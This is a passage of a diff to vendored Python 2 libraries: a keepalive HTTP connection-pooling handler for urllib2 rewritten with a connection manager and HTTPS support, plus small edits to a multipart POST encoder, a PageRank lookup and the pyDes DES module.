from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
|
||||
cells_to_erase = csbi.dwCursorPosition.X
|
||||
elif mode == 2:
|
||||
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
|
||||
cells_to_erase = csbi.dwSize.X
|
||||
# fill the entire screen with blanks
|
||||
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
|
||||
# now set the buffer's attributes accordingly
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
|
||||
|
||||
def set_title(self, title):
|
||||
win32.SetConsoleTitle(title)
|
||||
|
||||
525
thirdparty/keepalive/keepalive.py
vendored
525
thirdparty/keepalive/keepalive.py
vendored
@@ -1,30 +1,40 @@
|
||||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
# This library is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU Lesser General Public
|
||||
# License as published by the Free Software Foundation; either
|
||||
# version 2.1 of the License, or (at your option) any later version.
|
||||
#
|
||||
# Copyright 2002-2003 Michael D. Stenner
|
||||
#
|
||||
# This program is free software: you can redistribute it and/or modify it
|
||||
# under the terms of the GNU Lesser General Public License as published
|
||||
# by the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU Lesser General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU Lesser General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
# This library is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# Lesser General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU Lesser General Public
|
||||
# License along with this library; if not, write to the
|
||||
# Free Software Foundation, Inc.,
|
||||
# 59 Temple Place, Suite 330,
|
||||
# Boston, MA 02111-1307 USA
|
||||
|
||||
# This file was part of urlgrabber, a high-level cross-protocol url-grabber
|
||||
# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko
|
||||
# Copyright 2015 Sergio Fernández
|
||||
|
||||
"""An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive.
|
||||
|
||||
import urllib2
|
||||
from keepalive import HTTPHandler
|
||||
keepalive_handler = HTTPHandler()
|
||||
opener = urllib2.build_opener(keepalive_handler)
|
||||
urllib2.install_opener(opener)
|
||||
>>> import urllib2
|
||||
>>> from keepalive import HTTPHandler
|
||||
>>> keepalive_handler = HTTPHandler()
|
||||
>>> opener = urllib2.build_opener(keepalive_handler)
|
||||
>>> urllib2.install_opener(opener)
|
||||
>>>
|
||||
>>> fo = urllib2.urlopen('http://www.python.org')
|
||||
|
||||
fo = urllib2.urlopen('http://www.python.org')
|
||||
If a connection to a given host is requested, and all of the existing
|
||||
connections are still in use, another connection will be opened. If
|
||||
the handler tries to use an existing connection but it fails in some
|
||||
way, it will be closed and removed from the pool.
|
||||
|
||||
To remove the handler, simply re-run build_opener with no arguments, and
|
||||
install that opener.
|
||||
@@ -37,9 +47,13 @@ use the handler methods:
|
||||
close_all()
|
||||
open_connections()
|
||||
|
||||
Example:
|
||||
NOTE: using the close_connection and close_all methods of the handler
|
||||
should be done with care when using multiple threads.
|
||||
* there is nothing that prevents another thread from creating new
|
||||
connections immediately after connections are closed
|
||||
* no checks are done to prevent in-use connections from being closed
|
||||
|
||||
keepalive_handler.close_all()
|
||||
>>> keepalive_handler.close_all()
|
||||
|
||||
EXTRA ATTRIBUTES AND METHODS
|
||||
|
||||
@@ -55,162 +69,307 @@ EXTRA ATTRIBUTES AND METHODS
|
||||
If you want the best of both worlds, use this inside an
|
||||
AttributeError-catching try:
|
||||
|
||||
try: status = fo.status
|
||||
except AttributeError: status = None
|
||||
>>> try: status = fo.status
|
||||
>>> except AttributeError: status = None
|
||||
|
||||
Unfortunately, these are ONLY there if status == 200, so it's not
|
||||
easy to distinguish between non-200 responses. The reason is that
|
||||
urllib2 tries to do clever things with error codes 301, 302, 401,
|
||||
and 407, and it wraps the object upon return.
|
||||
|
||||
You can optionally set the module-level global HANDLE_ERRORS to 0,
|
||||
in which case the handler will always return the object directly.
|
||||
If you like the fancy handling of errors, don't do this. If you
|
||||
prefer to see your error codes, then do.
|
||||
For python versions earlier than 2.4, you can avoid this fancy error
|
||||
handling by setting the module-level global HANDLE_ERRORS to zero.
|
||||
You see, prior to 2.4, it's the HTTP Handler's job to determine what
|
||||
to handle specially, and what to just pass up. HANDLE_ERRORS == 0
|
||||
means "pass everything up". In python 2.4, however, this job no
|
||||
longer belongs to the HTTP Handler and is now done by a NEW handler,
|
||||
HTTPErrorProcessor. Here's the bottom line:
|
||||
|
||||
python version < 2.4
|
||||
HANDLE_ERRORS == 1 (default) pass up 200, treat the rest as
|
||||
errors
|
||||
HANDLE_ERRORS == 0 pass everything up, error processing is
|
||||
left to the calling code
|
||||
python version >= 2.4
|
||||
HANDLE_ERRORS == 1 pass up 200, treat the rest as errors
|
||||
HANDLE_ERRORS == 0 (default) pass everything up, let the
|
||||
other handlers (specifically,
|
||||
HTTPErrorProcessor) decide what to do
|
||||
|
||||
In practice, setting the variable either way makes little difference
|
||||
in python 2.4, so for the most consistent behavior across versions,
|
||||
you probably just want to use the defaults, which will give you
|
||||
exceptions on errors.
|
||||
|
||||
"""
|
||||
from httplib import _CS_REQ_STARTED, _CS_REQ_SENT, _CS_IDLE, CannotSendHeader
|
||||
|
||||
from lib.core.convert import unicodeencode
|
||||
from lib.core.data import kb
|
||||
# $Id: keepalive.py,v 1.17 2006/12/08 00:14:16 mstenner Exp $
|
||||
|
||||
import threading
|
||||
import urllib2
|
||||
import httplib
|
||||
import socket
|
||||
import thread
|
||||
|
||||
VERSION = (0, 1)
|
||||
#STRING_VERSION = '.'.join(map(str, VERSION))
|
||||
DEBUG = 0
|
||||
HANDLE_ERRORS = 1
|
||||
DEBUG = None
|
||||
|
||||
class HTTPHandler(urllib2.HTTPHandler):
|
||||
import sys
|
||||
if sys.version_info < (2, 4): HANDLE_ERRORS = 1
|
||||
else: HANDLE_ERRORS = 0
|
||||
|
||||
class ConnectionManager:
|
||||
"""
|
||||
The connection manager must be able to:
|
||||
* keep track of all existing
|
||||
"""
|
||||
def __init__(self):
|
||||
self._connections = {}
|
||||
self._lock = thread.allocate_lock()
|
||||
self._hostmap = {} # map hosts to a list of connections
|
||||
self._connmap = {} # map connections to host
|
||||
self._readymap = {} # map connection to ready state
|
||||
|
||||
def add(self, host, connection, ready):
|
||||
self._lock.acquire()
|
||||
try:
|
||||
if not self._hostmap.has_key(host): self._hostmap[host] = []
|
||||
self._hostmap[host].append(connection)
|
||||
self._connmap[connection] = host
|
||||
self._readymap[connection] = ready
|
||||
finally:
|
||||
self._lock.release()
|
||||
|
||||
def remove(self, connection):
|
||||
self._lock.acquire()
|
||||
try:
|
||||
try:
|
||||
host = self._connmap[connection]
|
||||
except KeyError:
|
||||
pass
|
||||
else:
|
||||
del self._connmap[connection]
|
||||
del self._readymap[connection]
|
||||
self._hostmap[host].remove(connection)
|
||||
if not self._hostmap[host]: del self._hostmap[host]
|
||||
finally:
|
||||
self._lock.release()
|
||||
|
||||
def set_ready(self, connection, ready):
|
||||
try: self._readymap[connection] = ready
|
||||
except KeyError: pass
|
||||
|
||||
def get_ready_conn(self, host):
|
||||
conn = None
|
||||
self._lock.acquire()
|
||||
try:
|
||||
if self._hostmap.has_key(host):
|
||||
for c in self._hostmap[host]:
|
||||
if self._readymap[c]:
|
||||
self._readymap[c] = 0
|
||||
conn = c
|
||||
break
|
||||
finally:
|
||||
self._lock.release()
|
||||
return conn
|
||||
|
||||
def get_all(self, host=None):
|
||||
if host:
|
||||
return list(self._hostmap.get(host, []))
|
||||
else:
|
||||
return dict(self._hostmap)
|
||||
|
||||
class KeepAliveHandler:
|
||||
def __init__(self):
|
||||
self._cm = ConnectionManager()
|
||||
|
||||
#### Connection Management
|
||||
def open_connections(self):
|
||||
"""return a list of connected hosts and the number of connections
|
||||
to each. [('foo.com:80', 2), ('bar.org', 1)]"""
|
||||
return [(host, len(li)) for (host, li) in self._cm.get_all().items()]
|
||||
|
||||
def close_connection(self, host):
|
||||
"""close connection to <host>
|
||||
"""close connection(s) to <host>
|
||||
host is the host:port spec, as in 'www.cnn.com:8080' as passed in.
|
||||
no error occurs if there is no connection to that host."""
|
||||
self._remove_connection(host, close=1)
|
||||
|
||||
def open_connections(self):
|
||||
"""return a list of connected hosts"""
|
||||
retVal = []
|
||||
currentThread = threading.currentThread()
|
||||
for name, host in self._connections.keys():
|
||||
if name == currentThread.getName():
|
||||
retVal.append(host)
|
||||
return retVal
|
||||
for h in self._cm.get_all(host):
|
||||
self._cm.remove(h)
|
||||
h.close()
|
||||
|
||||
def close_all(self):
|
||||
"""close all open connections"""
|
||||
for _, conn in self._connections.items():
|
||||
conn.close()
|
||||
self._connections = {}
|
||||
for host, conns in self._cm.get_all().items():
|
||||
for h in conns:
|
||||
self._cm.remove(h)
|
||||
h.close()
|
||||
|
||||
def _remove_connection(self, host, close=0):
|
||||
key = self._get_connection_key(host)
|
||||
if self._connections.has_key(key):
|
||||
if close: self._connections[key].close()
|
||||
del self._connections[key]
|
||||
def _request_closed(self, request, host, connection):
|
||||
"""tells us that this request is now closed and the the
|
||||
connection is ready for another request"""
|
||||
self._cm.set_ready(connection, 1)
|
||||
|
||||
def _get_connection_key(self, host):
|
||||
return (threading.currentThread().getName(), host)
|
||||
def _remove_connection(self, host, connection, close=0):
|
||||
if close: connection.close()
|
||||
self._cm.remove(connection)
|
||||
|
||||
def _start_connection(self, h, req):
|
||||
h.clearheaders()
|
||||
try:
|
||||
if req.has_data():
|
||||
data = req.get_data()
|
||||
h.putrequest('POST', req.get_selector())
|
||||
if not req.headers.has_key('Content-type'):
|
||||
req.headers['Content-type'] = 'application/x-www-form-urlencoded'
|
||||
if not req.headers.has_key('Content-length'):
|
||||
req.headers['Content-length'] = '%d' % len(data)
|
||||
else:
|
||||
h.putrequest(req.get_method() or 'GET', req.get_selector())
|
||||
|
||||
if not req.headers.has_key('Connection'):
|
||||
req.headers['Connection'] = 'keep-alive'
|
||||
|
||||
for args in self.parent.addheaders:
|
||||
h.putheader(*args)
|
||||
for k, v in req.headers.items():
|
||||
h.putheader(k, v)
|
||||
h.endheaders()
|
||||
if req.has_data():
|
||||
h.send(data)
|
||||
except socket.error, err:
|
||||
h.close()
|
||||
raise urllib2.URLError(err)
|
||||
|
||||
def do_open(self, http_class, req):
|
||||
h = None
|
||||
host = req.get_host()
|
||||
#### Transaction Execution
|
||||
def do_open(self, req):
|
||||
host = req.host
|
||||
if not host:
|
||||
raise urllib2.URLError('no host given')
|
||||
|
||||
try:
|
||||
need_new_connection = 1
|
||||
key = self._get_connection_key(host)
|
||||
h = self._connections.get(key)
|
||||
if not h is None:
|
||||
try:
|
||||
self._start_connection(h, req)
|
||||
except:
|
||||
r = None
|
||||
else:
|
||||
try: r = h.getresponse()
|
||||
except httplib.ResponseNotReady, e: r = None
|
||||
except httplib.BadStatusLine, e: r = None
|
||||
h = self._cm.get_ready_conn(host)
|
||||
while h:
|
||||
r = self._reuse_connection(h, req, host)
|
||||
|
||||
if r is None or r.version == 9:
|
||||
# httplib falls back to assuming HTTP 0.9 if it gets a
|
||||
# bad header back. This is most likely to happen if
|
||||
# the socket has been closed by the server since we
|
||||
# last used the connection.
|
||||
if DEBUG: print "failed to re-use connection to %s" % host
|
||||
h.close()
|
||||
else:
|
||||
if DEBUG: print "re-using connection to %s" % host
|
||||
need_new_connection = 0
|
||||
if need_new_connection:
|
||||
if DEBUG: print "creating new connection to %s" % host
|
||||
h = http_class(host)
|
||||
self._connections[key] = h
|
||||
self._start_connection(h, req)
|
||||
# if this response is non-None, then it worked and we're
|
||||
# done. Break out, skipping the else block.
|
||||
if r: break
|
||||
|
||||
# connection is bad - possibly closed by server
|
||||
# discard it and ask for the next free connection
|
||||
h.close()
|
||||
self._cm.remove(h)
|
||||
h = self._cm.get_ready_conn(host)
|
||||
else:
|
||||
# no (working) free connections were found. Create a new one.
|
||||
h = self._get_connection(host)
|
||||
if DEBUG: DEBUG.info("creating new connection to %s (%d)",
|
||||
host, id(h))
|
||||
self._cm.add(host, h, 0)
|
||||
self._start_transaction(h, req)
|
||||
r = h.getresponse()
|
||||
except socket.error, err:
|
||||
if h: h.close()
|
||||
except (socket.error, httplib.HTTPException), err:
|
||||
raise urllib2.URLError(err)
|
||||
|
||||
# if not a persistent connection, don't try to reuse it
|
||||
if r.will_close: self._remove_connection(host)
|
||||
if DEBUG: DEBUG.info("STATUS: %s, %s", r.status, r.reason)
|
||||
|
||||
# if not a persistent connection, don't try to reuse it
|
||||
if r.will_close:
|
||||
if DEBUG: DEBUG.info('server will close connection, discarding')
|
||||
self._cm.remove(h)
|
||||
|
||||
if DEBUG:
|
||||
print "STATUS: %s, %s" % (r.status, r.reason)
|
||||
r._handler = self
|
||||
r._host = host
|
||||
r._url = req.get_full_url()
|
||||
r._connection = h
|
||||
r.code = r.status
|
||||
r.headers = r.msg
|
||||
r.msg = r.reason
|
||||
|
||||
#if r.status == 200 or not HANDLE_ERRORS:
|
||||
#return r
|
||||
if r.status == 200 or not HANDLE_ERRORS:
|
||||
# [speedplane] Must return an adinfourl object
|
||||
resp = urllib2.addinfourl(r, r.msg, req.get_full_url())
|
||||
resp.code = r.status
|
||||
resp.msg = r.reason
|
||||
return resp;
|
||||
return r
|
||||
else:
|
||||
r.code = r.status
|
||||
return self.parent.error('http', req, r, r.status, r.reason, r.msg)
|
||||
return self.parent.error('http', req, r,
|
||||
r.status, r.msg, r.headers)
|
||||
|
||||
def _reuse_connection(self, h, req, host):
|
||||
"""start the transaction with a re-used connection
|
||||
return a response object (r) upon success or None on failure.
|
||||
This DOES not close or remove bad connections in cases where
|
||||
it returns. However, if an unexpected exception occurs, it
|
||||
will close and remove the connection before re-raising.
|
||||
"""
|
||||
try:
|
||||
self._start_transaction(h, req)
|
||||
r = h.getresponse()
|
||||
# note: just because we got something back doesn't mean it
|
||||
# worked. We'll check the version below, too.
|
||||
except (socket.error, httplib.HTTPException):
|
||||
r = None
|
||||
except:
|
||||
# adding this block just in case we've missed
|
||||
# something we will still raise the exception, but
|
||||
# lets try and close the connection and remove it
|
||||
# first. We previously got into a nasty loop
|
||||
# where an exception was uncaught, and so the
|
||||
# connection stayed open. On the next try, the
|
||||
# same exception was raised, etc. The tradeoff is
|
||||
# that it's now possible this call will raise
|
||||
# a DIFFERENT exception
|
||||
if DEBUG: DEBUG.error("unexpected exception - closing " + \
|
||||
"connection to %s (%d)", host, id(h))
|
||||
self._cm.remove(h)
|
||||
h.close()
|
||||
raise
|
||||
|
||||
if r is None or r.version == 9:
|
||||
# httplib falls back to assuming HTTP 0.9 if it gets a
|
||||
# bad header back. This is most likely to happen if
|
||||
# the socket has been closed by the server since we
|
||||
# last used the connection.
|
||||
if DEBUG: DEBUG.info("failed to re-use connection to %s (%d)",
|
||||
host, id(h))
|
||||
r = None
|
||||
else:
|
||||
if DEBUG: DEBUG.info("re-using connection to %s (%d)", host, id(h))
|
||||
|
||||
return r
|
||||
|
||||
def _start_transaction(self, h, req):
|
||||
try:
|
||||
if req.has_data():
|
||||
data = req.data
|
||||
if hasattr(req, 'selector'):
|
||||
h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
else:
|
||||
h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
if not req.headers.has_key('Content-type'):
|
||||
h.putheader('Content-type',
|
||||
'application/x-www-form-urlencoded')
|
||||
if not req.headers.has_key('Content-length'):
|
||||
h.putheader('Content-length', '%d' % len(data))
|
||||
else:
|
||||
if hasattr(req, 'selector'):
|
||||
h.putrequest(req.get_method() or 'GET', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
else:
|
||||
h.putrequest(req.get_method() or 'GET', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
except (socket.error, httplib.HTTPException), err:
|
||||
raise urllib2.URLError(err)
|
||||
|
||||
if not req.headers.has_key('Connection'):
|
||||
req.headers['Connection'] = 'keep-alive'
|
||||
|
||||
for args in self.parent.addheaders:
|
||||
if not req.headers.has_key(args[0]):
|
||||
h.putheader(*args)
|
||||
for k, v in req.headers.items():
|
||||
h.putheader(k, v)
|
||||
h.endheaders()
|
||||
if req.has_data():
|
||||
h.send(data)
|
||||
|
||||
def _get_connection(self, host):
|
||||
return NotImplementedError
|
||||
|
||||
class HTTPHandler(KeepAliveHandler, urllib2.HTTPHandler):
|
||||
def __init__(self):
|
||||
KeepAliveHandler.__init__(self)
|
||||
|
||||
def http_open(self, req):
|
||||
return self.do_open(HTTPConnection, req)
|
||||
return self.do_open(req)
|
||||
|
||||
def _get_connection(self, host):
|
||||
return HTTPConnection(host)
|
||||
|
||||
class HTTPSHandler(KeepAliveHandler, urllib2.HTTPSHandler):
|
||||
def __init__(self, ssl_factory=None):
|
||||
KeepAliveHandler.__init__(self)
|
||||
if not ssl_factory:
|
||||
try:
|
||||
import sslfactory
|
||||
ssl_factory = sslfactory.get_factory()
|
||||
except ImportError:
|
||||
pass
|
||||
self._ssl_factory = ssl_factory
|
||||
|
||||
def https_open(self, req):
|
||||
return self.do_open(req)
|
||||
|
||||
def _get_connection(self, host):
|
||||
try: return self._ssl_factory.get_https_connection(host)
|
||||
except AttributeError: return HTTPSConnection(host)
|
||||
|
||||
class HTTPResponse(httplib.HTTPResponse):
|
||||
|
||||
# we need to subclass HTTPResponse in order to
|
||||
# 1) add readline() and readlines() methods
|
||||
# 2) add close_connection() methods
|
||||
@@ -236,21 +395,31 @@ class HTTPResponse(httplib.HTTPResponse):
|
||||
else: # 2.2 doesn't
|
||||
httplib.HTTPResponse.__init__(self, sock, debuglevel)
|
||||
self.fileno = sock.fileno
|
||||
self.code = None
|
||||
self._method = method
|
||||
self._rbuf = ''
|
||||
self._rbuf = b""
|
||||
self._rbufsize = 8096
|
||||
self._handler = None # inserted by the handler later
|
||||
self._host = None # (same)
|
||||
self._url = None # (same)
|
||||
self._connection = None # (same)
|
||||
|
||||
_raw_read = httplib.HTTPResponse.read
|
||||
|
||||
def close(self):
|
||||
if self.fp:
|
||||
self.fp.close()
|
||||
self.fp = None
|
||||
if self._handler:
|
||||
self._handler._request_closed(self, self._host,
|
||||
self._connection)
|
||||
|
||||
def close_connection(self):
|
||||
self._handler._remove_connection(self._host, self._connection, close=1)
|
||||
self.close()
|
||||
self._handler._remove_connection(self._host, close=1)
|
||||
|
||||
def info(self):
|
||||
return self.msg
|
||||
return self.headers
|
||||
|
||||
def geturl(self):
|
||||
return self._url
|
||||
@@ -268,11 +437,11 @@ class HTTPResponse(httplib.HTTPResponse):
|
||||
return s
|
||||
|
||||
s = self._rbuf + self._raw_read(amt)
|
||||
self._rbuf = ''
|
||||
self._rbuf = b""
|
||||
return s
|
||||
|
||||
def readline(self, limit=-1):
|
||||
data = ""
|
||||
data = b""
|
||||
i = self._rbuf.find('\n')
|
||||
while i < 0 and not (0 < limit <= len(self._rbuf)):
|
||||
new = self._raw_read(self._rbufsize)
|
||||
@@ -302,43 +471,9 @@ class HTTPResponse(httplib.HTTPResponse):
|
||||
class HTTPConnection(httplib.HTTPConnection):
|
||||
# use the modified response class
|
||||
response_class = HTTPResponse
|
||||
_headers = None
|
||||
|
||||
def clearheaders(self):
|
||||
self._headers = {}
|
||||
|
||||
def putheader(self, header, value):
|
||||
"""Send a request header line to the server.
|
||||
|
||||
For example: h.putheader('Accept', 'text/html')
|
||||
"""
|
||||
if self.__state != _CS_REQ_STARTED:
|
||||
raise CannotSendHeader()
|
||||
|
||||
self._headers[header] = value
|
||||
|
||||
def endheaders(self):
|
||||
"""Indicate that the last header line has been sent to the server."""
|
||||
|
||||
if self.__state == _CS_REQ_STARTED:
|
||||
self.__state = _CS_REQ_SENT
|
||||
else:
|
||||
raise CannotSendHeader()
|
||||
|
||||
for header in ('Host', 'Accept-Encoding'):
|
||||
if header in self._headers:
|
||||
str = '%s: %s' % (header, self._headers[header])
|
||||
self._output(str)
|
||||
del self._headers[header]
|
||||
|
||||
for header, value in self._headers.items():
|
||||
str = '%s: %s' % (header, value)
|
||||
self._output(str)
|
||||
|
||||
self._send_output()
|
||||
|
||||
def send(self, str):
|
||||
httplib.HTTPConnection.send(self, unicodeencode(str, kb.pageEncoding))
|
||||
class HTTPSConnection(httplib.HTTPSConnection):
|
||||
response_class = HTTPResponse
|
||||
|
||||
#########################################################################
|
||||
##### TEST FUNCTIONS
|
||||
@@ -367,7 +502,7 @@ def error_handler(url):
|
||||
print " status = %s, reason = %s" % (status, reason)
|
||||
HANDLE_ERRORS = orig
|
||||
hosts = keepalive_handler.open_connections()
|
||||
print "open connections:", ' '.join(hosts)
|
||||
print "open connections:", hosts
|
||||
keepalive_handler.close_all()
|
||||
|
||||
def continuity(url):
|
||||
@@ -422,9 +557,10 @@ def comp(N, url):
|
||||
print ' improvement factor: %.2f' % (t1/t2, )
|
||||
|
||||
def fetch(N, url, delay=0):
|
||||
import time
|
||||
lens = []
|
||||
starttime = time.time()
|
||||
for i in xrange(N):
|
||||
for i in range(N):
|
||||
if delay and i > 0: time.sleep(delay)
|
||||
fo = urllib2.urlopen(url)
|
||||
foo = fo.read()
|
||||
@@ -440,6 +576,40 @@ def fetch(N, url, delay=0):
|
||||
|
||||
return diff
|
||||
|
||||
def test_timeout(url):
|
||||
global DEBUG
|
||||
dbbackup = DEBUG
|
||||
class FakeLogger:
|
||||
def debug(self, msg, *args): print msg % args
|
||||
info = warning = error = debug
|
||||
DEBUG = FakeLogger()
|
||||
print " fetching the file to establish a connection"
|
||||
fo = urllib2.urlopen(url)
|
||||
data1 = fo.read()
|
||||
fo.close()
|
||||
|
||||
i = 20
|
||||
print " waiting %i seconds for the server to close the connection" % i
|
||||
while i > 0:
|
||||
sys.stdout.write('\r %2i' % i)
|
||||
sys.stdout.flush()
|
||||
time.sleep(1)
|
||||
i -= 1
|
||||
sys.stderr.write('\r')
|
||||
|
||||
print " fetching the file a second time"
|
||||
fo = urllib2.urlopen(url)
|
||||
data2 = fo.read()
|
||||
fo.close()
|
||||
|
||||
if data1 == data2:
|
||||
print ' data are identical'
|
||||
else:
|
||||
print ' ERROR: DATA DIFFER'
|
||||
|
||||
DEBUG = dbbackup
|
||||
|
||||
|
||||
def test(url, N=10):
|
||||
print "checking error hander (do this on a non-200)"
|
||||
try: error_handler(url)
|
||||
@@ -452,6 +622,9 @@ def test(url, N=10):
|
||||
print
|
||||
print "performing speed comparison"
|
||||
comp(N, url)
|
||||
print
|
||||
print "performing dropped-connection check"
|
||||
test_timeout(url)
|
||||
|
||||
if __name__ == '__main__':
|
||||
import time
|
||||
|
||||
38
thirdparty/multipart/multipartpost.py
vendored
38
thirdparty/multipart/multipartpost.py
vendored
@@ -47,13 +47,13 @@ class MultipartPostHandler(urllib2.BaseHandler):
|
||||
def http_request(self, request):
|
||||
data = request.get_data()
|
||||
|
||||
if data is not None and type(data) != str:
|
||||
if isinstance(data, dict):
|
||||
v_files = []
|
||||
v_vars = []
|
||||
|
||||
try:
|
||||
for(key, value) in data.items():
|
||||
if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO):
|
||||
if isinstance(value, file) or hasattr(value, "file") or isinstance(value, StringIO.StringIO):
|
||||
v_files.append((key, value))
|
||||
else:
|
||||
v_vars.append((key, value))
|
||||
@@ -65,10 +65,10 @@ class MultipartPostHandler(urllib2.BaseHandler):
|
||||
data = urllib.urlencode(v_vars, doseq)
|
||||
else:
|
||||
boundary, data = self.multipart_encode(v_vars, v_files)
|
||||
contenttype = 'multipart/form-data; boundary=%s' % boundary
|
||||
#if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0):
|
||||
# print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
|
||||
request.add_unredirected_header('Content-Type', contenttype)
|
||||
contenttype = "multipart/form-data; boundary=%s" % boundary
|
||||
#if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0):
|
||||
# print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data")
|
||||
request.add_unredirected_header("Content-Type", contenttype)
|
||||
|
||||
request.add_data(data)
|
||||
return request
|
||||
@@ -78,32 +78,32 @@ class MultipartPostHandler(urllib2.BaseHandler):
|
||||
boundary = mimetools.choose_boundary()
|
||||
|
||||
if buf is None:
|
||||
buf = ''
|
||||
buf = ""
|
||||
|
||||
for (key, value) in vars:
|
||||
if key is not None and value is not None:
|
||||
buf += '--%s\r\n' % boundary
|
||||
buf += 'Content-Disposition: form-data; name="%s"' % key
|
||||
buf += '\r\n\r\n' + value + '\r\n'
|
||||
buf += "--%s\r\n" % boundary
|
||||
buf += "Content-Disposition: form-data; name=\"%s\"" % key
|
||||
buf += "\r\n\r\n" + value + "\r\n"
|
||||
|
||||
for (key, fd) in files:
|
||||
file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
|
||||
filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
|
||||
filename = fd.name.split("/")[-1] if "/" in fd.name else fd.name.split("\\")[-1]
|
||||
try:
|
||||
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
|
||||
contenttype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
|
||||
except:
|
||||
# Reference: http://bugs.python.org/issue9291
|
||||
contenttype = 'application/octet-stream'
|
||||
buf += '--%s\r\n' % boundary
|
||||
buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
|
||||
buf += 'Content-Type: %s\r\n' % contenttype
|
||||
# buf += 'Content-Length: %s\r\n' % file_size
|
||||
contenttype = "application/octet-stream"
|
||||
buf += "--%s\r\n" % boundary
|
||||
buf += "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n" % (key, filename)
|
||||
buf += "Content-Type: %s\r\n" % contenttype
|
||||
# buf += "Content-Length: %s\r\n" % file_size
|
||||
fd.seek(0)
|
||||
|
||||
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
|
||||
buf += '\r\n%s\r\n' % fd.read()
|
||||
buf += "\r\n%s\r\n" % fd.read()
|
||||
|
||||
buf += '--%s--\r\n\r\n' % boundary
|
||||
buf += "--%s--\r\n\r\n" % boundary
|
||||
|
||||
return boundary, buf
|
||||
|
||||
|
||||
9
thirdparty/pagerank/pagerank.py
vendored
9
thirdparty/pagerank/pagerank.py
vendored
@@ -14,14 +14,15 @@
|
||||
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
def get_pagerank(url):
|
||||
def get_pagerank(url, timeout=10):
|
||||
url = url.encode('utf8') if isinstance(url, unicode) else url
|
||||
_ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
|
||||
try:
|
||||
f = urllib.urlopen(_)
|
||||
rank = f.read().strip()[9:]
|
||||
except Exception:
|
||||
req = urllib2.Request(_)
|
||||
rank = urllib2.urlopen(req, timeout=timeout).read().strip()[9:]
|
||||
except:
|
||||
rank = 'N/A'
|
||||
else:
|
||||
rank = '0' if not rank or not rank.isdigit() else rank
|
||||
|
||||
12
thirdparty/pydes/pyDes.py
vendored
12
thirdparty/pydes/pyDes.py
vendored
@@ -59,7 +59,7 @@ pad -> Optional argument. Only when using padmode of PAD_NORMAL. For
|
||||
bytes of the unencrypted data block.
|
||||
padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL
|
||||
or PAD_PKCS5). Defaults to PAD_NORMAL.
|
||||
|
||||
|
||||
|
||||
Example
|
||||
-------
|
||||
@@ -153,7 +153,7 @@ class _baseDes(object):
|
||||
def getPadMode(self):
|
||||
"""getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5"""
|
||||
return self._padmode
|
||||
|
||||
|
||||
def setPadMode(self, mode):
|
||||
"""Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5"""
|
||||
self._padmode = mode
|
||||
@@ -188,7 +188,7 @@ class _baseDes(object):
|
||||
if not pad:
|
||||
raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=PAD_PKCS5 or set the pad character.")
|
||||
data += (self.block_size - (len(data) % self.block_size)) * pad
|
||||
|
||||
|
||||
elif padmode == PAD_PKCS5:
|
||||
pad_len = 8 - (len(data) % self.block_size)
|
||||
if _pythonMajorVersion < 3:
|
||||
@@ -454,7 +454,7 @@ class des(_baseDes):
|
||||
def __permutate(self, table, block):
|
||||
"""Permutate this block with the specified table"""
|
||||
return list(map(lambda x: block[x], table))
|
||||
|
||||
|
||||
# Transform the secret key, so that it is ready for data processing
|
||||
# Create the 16 subkeys, K[1] - K[16]
|
||||
def __create_sub_keys(self):
|
||||
@@ -554,7 +554,7 @@ class des(_baseDes):
|
||||
|
||||
i += 1
|
||||
iteration += iteration_adjustment
|
||||
|
||||
|
||||
# Final permutation of R[16]L[16]
|
||||
self.final = self.__permutate(des.__fp, self.R + self.L)
|
||||
return self.final
|
||||
@@ -597,7 +597,7 @@ class des(_baseDes):
|
||||
